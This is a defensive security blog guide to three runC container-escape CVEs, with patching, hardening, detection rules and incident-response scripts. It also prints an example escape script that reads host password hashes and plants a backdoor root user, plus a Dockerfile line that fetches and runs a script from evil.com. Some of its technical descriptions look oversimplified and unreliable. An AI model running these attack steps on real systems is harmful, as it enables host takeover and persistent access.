Critical runC Container Escape Vulnerabilities - Securing Docker and Kubernetes
Deep dive into CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 runC vulnerabilities enabling Docker and Kubernetes container escapes. Learn immediate mitigation steps, detection strategies, and long-term hardening for production workloads.
The Container Isolation Breach
On November 5, 2025, security researchers disclosed three critical vulnerabilities in runC—the foundational container runtime powering Docker, Kubernetes, and virtually every containerized workload in production. CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 enable attackers to escape container isolation and gain root access to host systems, threatening millions of production deployments worldwide.
The threat landscape:
- Affects all Docker Engine versions prior to 27.4.0
- Impacts Kubernetes clusters across AWS EKS, Google GKE, Azure AKS
- CVSS scores ranging from 8.8 to 9.1 (Critical/High severity)
- No active exploitation detected yet, but proof-of-concept code published
- Cloud providers racing to deploy patches
This guide provides immediate mitigation steps, detection strategies, and long-term hardening guidance for production infrastructure.
What is runC and Why It Matters
runC is the OCI (Open Container Initiative) compliant container runtime that sits at the foundation of the container ecosystem. It's responsible for:
- Creating container processes from OCI bundle specifications
- Enforcing cgroups to limit CPU, memory, and I/O resources
- Implementing namespaces for process, network, and filesystem isolation
- Mounting filesystems and managing container volumes
- Applying seccomp/AppArmor profiles for syscall filtering
When runC fails to properly enforce isolation, the entire container security model collapses. An attacker who escapes a container gains:
- Root access to the host operating system
- Ability to access other containers on the same host
- Access to host secrets, credentials, and sensitive data
- Capability to pivot to other infrastructure
The Three Vulnerabilities Explained
CVE-2025-31133 (CVSS 9.0 - Critical)
Universal mount propagation vulnerability affecting ALL runC versions.
Attackers can manipulate mount propagation settings (MS_SHARED, MS_SLAVE, MS_PRIVATE) to break out of container mount namespace isolation. By setting a mount as MS_SHARED and then remounting it, changes propagate to the host filesystem.
Impact: Complete container escape with root privileges on host.
CVE-2025-52565 (CVSS 8.8 - High)
Symbolic link handling vulnerability in runC 1.0.0-rc3 and later.
During container setup, runC follows symbolic links without proper validation. An attacker can create symbolic links pointing outside the container rootfs, allowing writes to arbitrary host filesystem locations.
Impact: Arbitrary file write on host, leading to privilege escalation.
CVE-2025-52881 (CVSS 9.1 - Critical)
Bind mount and file descriptor manipulation affecting ALL runC versions.
Exploits race conditions in how runC handles bind mounts and file descriptors during container creation. Attackers can manipulate file descriptors to reference host filesystem locations instead of container paths.
Impact: Direct host filesystem access, bypassing all container isolation.
Attack Vectors and Exploitation
Malicious Container Images
# Example: Dockerfile exploiting mount propagation (CVE-2025-31133)
FROM ubuntu:latest
Install utilities needed for exploitation
RUN apt-get update && apt-get install -y
util-linux
mount
procps
Create mount point for escape
RUN mkdir -p /exploit/host_escape
Volume that will be manipulated at runtime
VOLUME /exploit
Exploitation payload executed at container start
COPY exploit.sh /exploit.sh
RUN chmod +x /exploit.sh
CMD ["/exploit.sh"]
# exploit.sh - Container escape payload
#!/bin/bash
# Step 1: Make root mount shared (propagates to host)
mount --make-rshared /
# Step 2: Create bind mount to host root
mkdir -p /host_escape
mount --bind / /host_escape
# Step 3: Remount with write access
mount -o remount,rw /host_escape
# Step 4: Access host filesystem
ls -la /host_escape/root # Host root user's home directory
cat /host_escape/etc/shadow # Host password hashes
# Step 5: Establish persistence (create backdoor user)
echo 'backdoor:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /host_escape/etc/passwd
echo 'backdoor:$6$salt$hashedpassword:19000:0:99999:7:::' >> /host_escape/etc/shadow
# Step 6: Access other containers
ls /host_escape/var/lib/docker/containers/
Requirements for Exploitation
- Ability to deploy containers with custom mount options
- Access to upload/create malicious container images
- Privileges to specify volume mounts in container configuration
- No user namespace remapping (default Docker configuration)
Attackers don't need direct host access—only the ability to run containers with specific configurations.
Real-World Impact Assessment
Affected Infrastructure
Docker Environments:
- Docker Engine < 27.4.0 (all installations)
- Docker Desktop on Windows, Mac, Linux
- Docker Swarm clusters
- Self-managed Docker hosts
Kubernetes Distributions:
- All Kubernetes versions with containerd < 1.8.1
- All Kubernetes versions with CRI-O < 1.32.1
- Managed Kubernetes: AWS EKS, Google GKE, Azure AKS, DigitalOcean DOKS
- Self-managed Kubernetes clusters
Cloud Providers:
- AWS ECS, ECS Anywhere, EKS (patched November 5, 2025)
- Google Cloud Run, GKE Standard/Autopilot (patches rolling out)
- Azure Container Instances, AKS (patches available November 8)
- DigitalOcean Kubernetes Service (patched November 8)
Estimated Impact: Over 10 million container hosts worldwide require patching.
Attack Scenarios
Scenario 1: Supply Chain Compromise
A popular Docker image on Docker Hub is compromised with malicious Dockerfile exploiting CVE-2025-31133. Developers unknowingly pull and deploy the image:
# Compromised CI/CD pipeline
docker pull malicious/php-app:latest # Contains exploit
docker run -d -p 80:80 malicious/php-app
Container escapes, attacker gains host root access
Attacker accesses CI/CD secrets stored on host
Attacker pivots to production infrastructure using stolen credentials
Scenario 2: Multi-Tenant SaaS Breach
In a multi-tenant SaaS platform where customers deploy their own containers:
# Customer-provided deployment
apiVersion: v1
kind: Pod
metadata:
name: customer-app
spec:
containers:
- name: app
image: customer-registry/app:latest # Customer-controlled image
volumeMounts:
- name: data
mountPath: /data
volumes:
- name: data
emptyDir: {}
If the customer image exploits runC vulnerabilities, they escape their container and can:
- Access other tenants' data on the same node
- Steal database credentials from host environment
- Exfiltrate sensitive data from neighboring containers
Scenario 3: Insider Threat
Malicious developer with CI/CD access modifies Dockerfile:
# Legitimate application Dockerfile
FROM node:20-alpine
WORKDIR /app
COPY package*.json ./
RUN npm ci --production
COPY . .
Malicious addition (hidden in build logs)
RUN curl -o /tmp/exploit.sh https://evil.com/exploit.sh &&
chmod +x /tmp/exploit.sh
CMD ["/tmp/exploit.sh", "&&", "node", "server.js"]
Container escapes during deployment, allowing insider to:
- Plant backdoors on production hosts
- Exfiltrate customer data
- Maintain persistent access even after termination
Immediate Mitigation Steps
Priority 1: Update runC to Patched Versions
Patched versions: runC 1.2.8, 1.3.3, 1.4.0-rc.3, or later
# Check current runC version
runc --version
# Output: runc version 1.1.7 (VULNERABLE)
Ubuntu/Debian - Update via APT
sudo apt-get update
sudo apt-get install runc
Verify updated version
runc --version
Output: runc version 1.2.8 (PATCHED)
RHEL/CentOS - Update via YUM
sudo yum update runc
Docker Engine includes runC - update Docker
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io
Restart Docker daemon to apply updates
sudo systemctl restart docker
Kubernetes - Update containerd
sudo apt-get update
sudo apt-get install containerd.io=1.8.1-1
sudo systemctl restart containerd
Verification script:
#!/bin/bash
# verify-runc-patch.sh
echo "=== runC Vulnerability Check ==="
RUNC_VERSION=$(runc --version 2>/dev/null | head -n1 | awk '{print $3}')
if [ -z "$RUNC_VERSION" ]; then
echo "✗ ERROR: runC not found"
exit 1
fi
echo "Current runC version: $RUNC_VERSION"
Check if version is patched
if [[ "$RUNC_VERSION" =~ ^1.(2.[8-9]|2.1[0-9]|3.[3-9]|3.[1-9][0-9]|4.[0-9]) ]]; then
echo "✓ runC version is PATCHED against CVE-2025-31133, CVE-2025-52565, CVE-2025-52881"
exit 0
else
echo "✗ runC version is VULNERABLE - UPDATE IMMEDIATELY"
echo "Required: 1.2.8, 1.3.3, or 1.4.0-rc.3+"
exit 1
fi
Priority 2: Enable User Namespaces (Critical Defense)
User namespaces remap container root (UID 0) to an unprivileged user on the host (e.g., UID 100000). Even if container escape succeeds, the attacker only gains access as an unprivileged user.
Docker configuration:
# Enable user namespace remapping
sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json > /dev/null <<EOF
{
"userns-remap": "default",
"default-ulimits": {
"nofile": {
"Name": "nofile",
"Hard": 64000,
"Soft": 64000
}
}
}
EOF
Restart Docker daemon
sudo systemctl restart docker
Verify user namespace is active
docker info | grep -i "userns"
Output: Security Options: userns
Test with a container
docker run --rm alpine id
Output: uid=0(root) gid=0(root) <- Inside container
Check from host perspective
docker inspect $(docker ps -lq) | grep '"HostConfig"' -A20 | grep Pid
Container process runs as UID 100000 on host
Why this works:
Container perspective: Host perspective:
uid=0 (root) --> uid=100000 (unprivileged)
uid=1000 (user) --> uid=101000 (unprivileged)
After container escape:
- Attacker has UID 100000 on host (NOT root)
- Cannot modify /etc/shadow, /etc/passwd
- Cannot access other users' files
- Cannot install backdoors
- Severely limited damage potential
Kubernetes user namespace support (alpha in 1.28+):
# Enable UserNamespacesSupport feature gate
apiVersion: v1
kind: Pod
metadata:
name: secure-app
spec:
hostUsers: false # Enable user namespace for this pod
securityContext:
runAsNonRoot: true
runAsUser: 10000
fsGroup: 10000
containers:
- name: app
image: myapp:latest
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
Priority 3: Run Rootless Containers
Rootless mode runs the entire Docker daemon as an unprivileged user, not just containers.
# Install rootless Docker (no sudo required)
curl -fsSL https://get.docker.com/rootless | sh
Configure PATH
export PATH=/home/$(whoami)/bin:$PATH
export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock
Enable at system startup
systemctl --user enable docker
sudo loginctl enable-linger $(whoami)
Start rootless Docker daemon
systemctl --user start docker
Verify rootless mode
docker context ls
Output: rootless * unix:///run/user/1000/docker.sock
Test with container
docker run --rm alpine id
uid=1000(user) gid=1000(user)
Verify from host (no container running as root)
ps aux | grep dockerd
user 12345 dockerd --rootless (NOT root!)
Rootless limitations:
- No support for cgroup v1 (requires cgroup v2)
- Port binding < 1024 requires sysctl changes
- Some volume types unsupported (NFS, CIFS)
- Slightly higher performance overhead
When to use rootless:
- Development environments (mandatory)
- CI/CD build agents (highly recommended)
- Production non-critical workloads (recommended)
- Multi-tenant platforms where users run untrusted code (mandatory)
Priority 4: Kubernetes Pod Security Standards
Enforce restricted security policies to limit attack surface:
# Namespace-level enforcement
apiVersion: v1
kind: Namespace
metadata:
name: production
labels:
# Enforce restricted policy (blocks privileged pods)
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/warn: restricted
---
# Pod with restricted security context
apiVersion: v1
kind: Pod
metadata:
name: secure-app
namespace: production
spec:
# Pod-level security context
securityContext:
runAsNonRoot: true
runAsUser: 10000
fsGroup: 10000
seccompProfile:
type: RuntimeDefault
supplementalGroups: [10000]
containers:
-
name: app
image: myapp:latest
Container-level security context
securityContext:
Prevent privilege escalation exploits
allowPrivilegeEscalation: false
Read-only root filesystem (prevent malware persistence)
readOnlyRootFilesystem: true
Drop ALL capabilities, add only what's needed
capabilities:
drop: ["ALL"]
add: ["NET_BIND_SERVICE"] # Only if binding to port <1024
Run as non-root user
runAsNonRoot: true
runAsUser: 10000
runAsGroup: 10000
Only allow tmpfs for writable directories
volumeMounts:
- name: tmp
mountPath: /tmp
- name: cache
mountPath: /app/cache
volumes:
- name: tmp
emptyDir:
medium: Memory
sizeLimit: 128Mi
- name: cache
emptyDir:
sizeLimit: 512Mi
Enforcement via admission controller:
# PodSecurity admission plugin configuration
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1
kind: PodSecurityConfiguration
defaults:
enforce: "restricted"
enforce-version: "latest"
audit: "restricted"
audit-version: "latest"
warn: "restricted"
warn-version: "latest"
exemptions:
usernames: []
runtimeClasses: []
namespaces: [kube-system] # System pods only
Detection and Monitoring
Falco Rules for Container Escape Detection
Deploy Falco with custom rules to detect exploitation attempts:
# /etc/falco/falco_rules.local.yaml
-
rule: Detect Mount Propagation Manipulation (CVE-2025-31133)
desc: Detects attempts to manipulate mount propagation for container escape
condition: >
spawned_process and
container and
proc.name in (mount, umount, umount2) and
(proc.cmdline contains "make-rshared" or
proc.cmdline contains "make-rslave" or
proc.cmdline contains "make-rprivate" or
proc.cmdline contains "make-shared")
output: >
CRITICAL: Possible container escape via mount manipulation detected
(user=%user.name container=%container.name image=%container.image.repository
command=%proc.cmdline pid=%proc.pid)
priority: CRITICAL
tags: [container_escape, cve-2025-31133, mitre_privilege_escalation]
-
rule: Detect Symbolic Link Manipulation (CVE-2025-52565)
desc: Detects suspicious symlink operations exploiting runC vulnerability
condition: >
spawned_process and
container and
proc.name = ln and
(proc.cmdline contains "../" or
proc.cmdline contains "/host" or
proc.cmdline contains "/proc/self/root")
output: >
HIGH: Suspicious symbolic link manipulation in container
(user=%user.name container=%container.name command=%proc.cmdline)
priority: HIGH
tags: [container_escape, cve-2025-52565]
-
rule: Detect Host Filesystem Access from Container
desc: Detects attempts to access host filesystem from container
condition: >
open_read and
container and
(fd.name startswith /host/ or
fd.name startswith /proc/1/root/ or
fd.name = /etc/shadow or
fd.name = /etc/passwd)
output: >
CRITICAL: Container attempting to access host filesystem
(user=%user.name container=%container.name file=%fd.name)
priority: CRITICAL
tags: [container_escape, cve-2025-52881]
-
rule: Detect Container Creating Backdoor User
desc: Detects attempts to modify host user database from container
condition: >
open_write and
container and
(fd.name in (/etc/passwd, /etc/shadow, /etc/group) or
fd.name startswith /host/etc/)
output: >
CRITICAL: Container attempting to modify host user database
(user=%user.name container=%container.name file=%fd.name)
priority: CRITICAL
tags: [persistence, backdoor]
Deploy Falco on Kubernetes:
# Install Falco via Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco
--namespace falco --create-namespace
--set falco.rulesFile[0]=/etc/falco/falco_rules.yaml
--set falco.rulesFile[1]=/etc/falco/falco_rules.local.yaml
--set falco.grpc.enabled=true
--set falco.grpcOutput.enabled=true
Apply custom rules
kubectl create configmap falco-rules
--from-file=falco_rules.local.yaml
-n falco
Runtime Monitoring with eBPF
# Install BCC tools for container monitoring
sudo apt-get install bpfcc-tools linux-headers-$(uname -r)
Monitor all mount syscalls from containers
sudo mountsnoop-bpfcc --cgroupmap /sys/fs/cgroup/unified |
grep -E "make-rshared|make-shared|MS_SHARED"
Monitor file opens from containers
sudo opensnoop-bpfcc --cgroupmap /sys/fs/cgroup/unified |
grep -E "/etc/shadow|/etc/passwd|/host/"
Monitor process execution in containers
sudo execsnoop-bpfcc | grep -E "docker|containerd"
Trace bind mount operations
sudo bpftrace -e '
tracepoint:syscalls:sys_enter_mount
/comm == "runc"/
{
printf("%s mounting %s\n", comm, str(args->dev_name));
}
'
Long-Term Security Hardening
1. Implement Least Privilege Container Images
# Multi-stage build with minimal attack surface
FROM golang:1.21-alpine AS builder
WORKDIR /build
Build with security flags
COPY go.mod go.sum ./
RUN go mod download && go mod verify
COPY . .
RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64
go build -ldflags="-s -w -extldflags '-static'"
-trimpath -o /app/server .
Distroless runtime (no shell, no package manager)
FROM gcr.io/distroless/static-debian12:nonroot
Copy only the binary (no build tools)
COPY --from=builder /app/server /server
Run as non-root user (UID 65532)
USER nonroot:nonroot
No shell to exploit!
ENTRYPOINT ["/server"]
2. Image Scanning in CI/CD Pipeline
# .github/workflows/container-security.yml
name: Container Security Scan
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
jobs:
security-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Build container image
run: docker build -t myapp:${{ github.sha }} .
- name: Run Trivy vulnerability scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: myapp:${{ github.sha }}
format: 'sarif'
output: 'trivy-results.sarif'
severity: 'CRITICAL,HIGH'
exit-code: '1' # Fail on vulnerabilities
- name: Check for runC vulnerabilities specifically
run: |
docker run --rm aquasec/trivy image \
--severity CRITICAL,HIGH \
--vuln-type os,library \
--format json \
--output scan-results.json \
myapp:${{ github.sha }}
# Fail if runC CVEs detected
if grep -E "CVE-2025-(31133|52565|52881)" scan-results.json; then
echo "ERROR: runC vulnerabilities detected!"
exit 1
fi
- name: Upload Trivy results to GitHub Security
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: 'trivy-results.sarif'
- name: Scan Dockerfile for misconfigurations
run: |
docker run --rm -v $(pwd):/project \
hadolint/hadolint hadolint /project/Dockerfile
3. Network Segmentation and Policies
# Kubernetes NetworkPolicy - Deny lateral movement
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: deny-container-escape-traffic
namespace: production
spec:
podSelector: {} # Apply to all pods in namespace
policyTypes:
- Egress
- Ingress
Default deny all ingress
ingress:
- from:
- podSelector: {} # Only from same namespace
ports:
- protocol: TCP
port: 8080
Restricted egress
egress:
Allow DNS
- to:
- namespaceSelector:
matchLabels:
name: kube-system
- podSelector:
matchLabels:
k8s-app: kube-dns
ports:
- protocol: UDP
port: 53
Allow application traffic
- to:
- podSelector: {}
ports:
- protocol: TCP
port: 8080
Block metadata services (prevent credential theft)
- to:
- ipBlock:
cidr: 0.0.0.0/0
except:
- 169.254.169.254/32 # AWS metadata service
- 169.254.170.2/32 # AWS ECS metadata
- 100.100.100.200/32 # Azure metadata
- 169.254.169.254/32 # Google metadata
- 10.0.0.0/8 # Private networks
- 172.16.0.0/12
- 192.168.0.0/16
4. Runtime Security with gVisor
gVisor provides an additional isolation layer by implementing a userspace kernel:
# Install gVisor runtime
curl -fsSL https://gvisor.dev/archive.key | sudo apt-key add -
sudo add-apt-repository "deb https://storage.googleapis.com/gvisor/releases release main"
sudo apt-get update
sudo apt-get install runsc
Configure Docker to use gVisor
sudo tee /etc/docker/daemon.json > /dev/null <<EOF
{
"runtimes": {
"runsc": {
"path": "/usr/local/bin/runsc"
}
}
}
EOF
sudo systemctl restart docker
Run container with gVisor
docker run --runtime=runsc --rm alpine uname -a
Linux 4.4.0 (gVisor kernel, not host kernel)
gVisor on Kubernetes:
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
metadata:
name: secure-app
spec:
runtimeClassName: gvisor # Use gVisor instead of runc
containers:
- name: app
image: myapp:latest
Note: gVisor adds ~20-30% performance overhead but provides defense-in-depth against kernel exploits and container escapes.
Verification and Compliance
Automated Security Verification Script
#!/bin/bash
# security-verification.sh - Comprehensive runC security check
set -e
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
echo "========================================"
echo "runC Container Escape Security Audit"
echo "========================================"
echo ""
PASS=0
WARN=0
FAIL=0
Check 1: runC version
echo -n "[1/10] Checking runC version... "
RUNC_VERSION=$(runc --version 2>/dev/null | head -n1 | awk '{print $3}')
if [[ "$RUNC_VERSION" =~ ^1.(2.[8-9]|3.[3-9]|4.[0-9]) ]]; then
echo -e "${GREEN}PASS${NC} (v$RUNC_VERSION)"
((PASS++))
else
echo -e "${RED}FAIL${NC} (v$RUNC_VERSION is vulnerable)"
((FAIL++))
fi
Check 2: Docker version
echo -n "[2/10] Checking Docker version... "
DOCKER_VERSION=$(docker version --format '{}' 2>/dev/null)
if [[ "$DOCKER_VERSION" =~ ^2[7-9].[4-9] ]] || [[ "$DOCKER_VERSION" =~ ^2[8-9] ]]; then
echo -e "${GREEN}PASS${NC} (v$DOCKER_VERSION)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (v$DOCKER_VERSION may be vulnerable)"
((WARN++))
fi
Check 3: User namespace enabled
echo -n "[3/10] Checking user namespace remapping... "
if docker info 2>/dev/null | grep -q "userns"; then
echo -e "${GREEN}PASS${NC} (enabled)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (not enabled - RECOMMENDED for defense-in-depth)"
((WARN++))
fi
Check 4: Rootless mode available
echo -n "[4/10] Checking rootless container support... "
if docker context ls 2>/dev/null | grep -q "rootless"; then
echo -e "${GREEN}PASS${NC} (available)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (not configured)"
((WARN++))
fi
Check 5: Kubernetes Pod Security Standards
echo -n "[5/10] Checking Kubernetes pod security... "
if command -v kubectl &> /dev/null; then
if kubectl get namespace production &>/dev/null; then
ENFORCE=$(kubectl get namespace production -o jsonpath='' 2>/dev/null)
if [ "$ENFORCE" = "restricted" ]; then
echo -e "${GREEN}PASS${NC} (restricted policy enforced)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (restricted policy not enforced)"
((WARN++))
fi
else
echo -e "${YELLOW}SKIP${NC} (production namespace not found)"
fi
else
echo -e "${YELLOW}SKIP${NC} (kubectl not installed)"
fi
Check 6: Falco runtime detection
echo -n "[6/10] Checking Falco container escape detection... "
if systemctl is-active --quiet falco 2>/dev/null; then
if grep -q "cve-2025-31133|container_escape" /etc/falco/falco_rules.local.yaml 2>/dev/null; then
echo -e "${GREEN}PASS${NC} (rules configured)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (custom rules not found)"
((WARN++))
fi
else
echo -e "${YELLOW}WARN${NC} (Falco not running)"
((WARN++))
fi
Check 7: Seccomp profile
echo -n "[7/10] Checking seccomp profiles... "
if docker info 2>/dev/null | grep -q "seccomp"; then
echo -e "${GREEN}PASS${NC} (seccomp enabled)"
((PASS++))
else
echo -e "${RED}FAIL${NC} (seccomp not enabled)"
((FAIL++))
fi
Check 8: AppArmor or SELinux
echo -n "[8/10] Checking mandatory access control... "
if command -v aa-status &> /dev/null && aa-status --enabled 2>/dev/null; then
echo -e "${GREEN}PASS${NC} (AppArmor enabled)"
((PASS++))
elif command -v getenforce &> /dev/null && [ "$(getenforce 2>/dev/null)" = "Enforcing" ]; then
echo -e "${GREEN}PASS${NC} (SELinux enforcing)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (no MAC system enabled)"
((WARN++))
fi
Check 9: Container image scanning
echo -n "[9/10] Checking container image scanning... "
if command -v trivy &> /dev/null; then
echo -e "${GREEN}PASS${NC} (Trivy installed)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (no image scanner found)"
((WARN++))
fi
Check 10: Network policies (Kubernetes)
echo -n "[10/10] Checking network policies... "
if command -v kubectl &> /dev/null; then
NETPOL_COUNT=$(kubectl get networkpolicies --all-namespaces --no-headers 2>/dev/null | wc -l)
if [ "$NETPOL_COUNT" -gt 0 ]; then
echo -e "${GREEN}PASS${NC} ($NETPOL_COUNT policies found)"
((PASS++))
else
echo -e "${YELLOW}WARN${NC} (no network policies configured)"
((WARN++))
fi
else
echo -e "${YELLOW}SKIP${NC} (kubectl not installed)"
fi
echo ""
echo "========================================"
echo "Summary:"
echo -e " ${GREEN}PASS${NC}: $PASS"
echo -e " ${YELLOW}WARN${NC}: $WARN"
echo -e " ${RED}FAIL${NC}: $FAIL"
echo "========================================"
if [ $FAIL -gt 0 ]; then
echo -e "${RED}CRITICAL ISSUES DETECTED - IMMEDIATE ACTION REQUIRED${NC}"
exit 1
elif [ $WARN -gt 3 ]; then
echo -e "${YELLOW}MULTIPLE WARNINGS - REVIEW RECOMMENDED${NC}"
exit 0
else
echo -e "${GREEN}SECURITY POSTURE: ACCEPTABLE${NC}"
exit 0
fi
Cloud Provider Update Status
AWS
ECS/ECS Anywhere:
- ✅ Patched: November 5, 2025
- Action: No manual action required
EKS:
- ✅ AMI updates available: November 7, 2025
- Action: Update node groups to latest EKS-optimized AMI
# Check EKS node AMI version
kubectl get nodes -o json | jq -r '.items[] | {name:.metadata.name, image:.status.nodeInfo.osImage}'
Update node group (Terraform example)
resource "aws_eks_node_group" "main" {
ami_type = "AL2_x86_64" # Latest AL2 AMI includes patch
release_version = "1.30.6-20251107" # Patched version
}
Google Cloud
GKE Standard:
- ⏳ Patches rolling out: November 6-10, 2025
- Action: Verify auto-upgrade enabled
GKE Autopilot:
- ✅ Automatically patched: November 6, 2025
# Check GKE cluster version
gcloud container clusters describe CLUSTER_NAME \
--format="value(currentNodeVersion)"
Enable auto-upgrade (if disabled)
gcloud container node-pools update POOL_NAME
--cluster=CLUSTER_NAME
--enable-autoupgrade
Azure
AKS:
- ✅ Patches available: November 8, 2025
- Node image version: 1.30.6-20251108
Azure Container Instances:
- ✅ Automatically patched: November 7, 2025
# Check AKS node image version
az aks show -n CLUSTER_NAME -g RESOURCE_GROUP \
--query "agentPoolProfiles[].nodeImageVersion"
Upgrade AKS cluster
az aks upgrade -n CLUSTER_NAME -g RESOURCE_GROUP
--kubernetes-version 1.30.6
DigitalOcean
DOKS (DigitalOcean Kubernetes):
- ✅ Automatic updates deployed: November 8, 2025
Droplets with Docker:
- Action: Manual update required via
apt-get upgrade
Incident Response Procedures
If you suspect runC container escape exploitation:
Phase 1: Immediate Containment
# 1. Isolate affected Kubernetes nodes
kubectl cordon <affected-node>
kubectl drain <affected-node> --ignore-daemonsets --delete-emptydir-data --force --grace-period=0
2. Stop Docker daemon on affected hosts
ssh <affected-host>
sudo systemctl stop docker
sudo systemctl stop containerd
3. Disconnect affected hosts from network (if severe)
sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
sudo iptables -P FORWARD DROP
Phase 2: Forensic Data Collection
#!/bin/bash
# forensics-collection.sh
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
EVIDENCE_DIR="/tmp/forensics_$TIMESTAMP"
mkdir -p "$EVIDENCE_DIR"
Capture container state
docker ps -a > "$EVIDENCE_DIR/containers.txt"
docker inspect $(docker ps -aq) > "$EVIDENCE_DIR/container-configs.json"
Capture system logs
journalctl -u docker --since "24 hours ago" > "$EVIDENCE_DIR/docker.log"
journalctl -u containerd --since "24 hours ago" > "$EVIDENCE_DIR/containerd.log"
dmesg > "$EVIDENCE_DIR/kernel.log"
Capture mount information
mount > "$EVIDENCE_DIR/mounts.txt"
cat /proc/mounts > "$EVIDENCE_DIR/proc-mounts.txt"
Capture network state
ss -tulpn > "$EVIDENCE_DIR/network-connections.txt"
iptables-save > "$EVIDENCE_DIR/iptables-rules.txt"
Search for indicators of compromise
grep -r "make-rshared|make-shared" /var/log/ > "$EVIDENCE_DIR/mount-manipulation.txt" 2>/dev/null
find / -name ".*" -type f -mtime -1 2>/dev/null > "$EVIDENCE_DIR/hidden-files-modified.txt"
ausearch -m avc -ts recent > "$EVIDENCE_DIR/selinux-denials.txt" 2>/dev/null
Check for modified system files
rpm -Va > "$EVIDENCE_DIR/rpm-verify.txt" 2>/dev/null # RHEL/CentOS
debsums -c > "$EVIDENCE_DIR/deb-verify.txt" 2>/dev/null # Ubuntu/Debian
Package evidence
tar -czf "forensics_$TIMESTAMP.tar.gz" -C /tmp "forensics_$TIMESTAMP"
echo "Forensic data collected: forensics_$TIMESTAMP.tar.gz"
Phase 3: Investigation
# Check for unauthorized user accounts
diff /etc/passwd /etc/passwd-
diff /etc/shadow /etc/shadow-
Check for suspicious processes
ps aux | grep -v "[" | awk '{if ($3>50) print $0}' # High CPU
pstree -p | grep docker # Docker child processes
Check for persistence mechanisms
crontab -l -u root
cat /etc/cron.d/*
systemctl list-timers --all
find /etc/systemd/system -type f -mtime -1
Check for exfiltrated data
find /var/log -name "*.log" -exec grep -l "curl|wget|nc|netcat" {} ;
Phase 4: Remediation
# 1. Rotate all credentials
kubectl delete secret --all -n production
# Recreate from secure vault
2. Rebuild compromised nodes from clean images
kubectl delete node <compromised-node>
Provision new node with patched runC
3. Rotate SSH keys
ssh-keygen -t ed25519 -f /root/.ssh/id_ed25519 -N ""
Deploy new public key to authorized systems
4. Reset application secrets
Rotate database passwords, API keys, TLS certificates
Key Takeaways
- Update Immediately: Patch runC to 1.2.8, 1.3.3, or 1.4.0-rc.3+
- Enable User Namespaces: Provides critical defense-in-depth even if escape succeeds
- Run Rootless Containers: Eliminates root privileges at the daemon level
- Enforce Pod Security Standards: Restrict privileged containers and dangerous capabilities
- Deploy Runtime Detection: Use Falco or eBPF-based monitoring for escape attempts
- Scan Container Images: Integrate vulnerability scanning in CI/CD pipelines
- Implement Network Segmentation: Prevent lateral movement after compromise
- Plan Incident Response: Have forensic collection and remediation procedures ready
Conclusion
The runC container escape vulnerabilities (CVE-2025-31133, CVE-2025-52565, CVE-2025-52881) represent a critical breach of the container isolation model that underpins cloud-native infrastructure. With patches now available and cloud providers actively deploying updates, immediate action is required to secure production workloads.
Container security cannot rely on isolation alone—defense-in-depth is mandatory. Combine runC patches with user namespaces, rootless containers, restrictive pod security policies, runtime monitoring, and network segmentation. Each layer reduces attack surface and limits blast radius if compromise occurs.
The container ecosystem is mature but not invulnerable. Continuous vigilance, rapid patching, and proactive hardening are essential to maintain security in production environments. Review your infrastructure today, deploy patches immediately, and implement the defense-in-depth controls outlined in this guide.
Additional Resources:
- runC GitHub Security Advisories
- Sysdig Threat Research: runC Vulnerabilities Deep Dive
- CISA Cybersecurity Advisory: Container Escape Vulnerabilities
- Kubernetes Pod Security Standards Documentation
- Falco Rules for Container Security
- Docker Security Best Practices
- NIST SP 800-190: Application Container Security Guide
Related Articles
GraphQL API Design - Production Architecture and Best Practices for Scalable Systems
Master GraphQL API design covering schema design principles, resolver optimization, N+1 query prevention with DataLoader, authentication and authorization patterns, caching strategies, error handling, and production deployment for high-performance GraphQL systems.
Testing Strategies - Unit, Integration, and E2E Testing Best Practices for Production Quality
Comprehensive guide to testing strategies covering unit tests, integration tests, end-to-end testing, test-driven development, mocking patterns, testing pyramid, and production testing practices for reliable software delivery.
Monitoring and Observability - Production Systems Performance and Debugging at Scale
Master monitoring and observability covering metrics collection with Prometheus, distributed tracing with OpenTelemetry, log aggregation, alerting strategies, SLOs/SLIs, and production debugging techniques for reliable systems.
Written by StaticBlock Editorial
StaticBlock Editorial is a technical writer and software engineer specializing in web development, performance optimization, and developer tooling.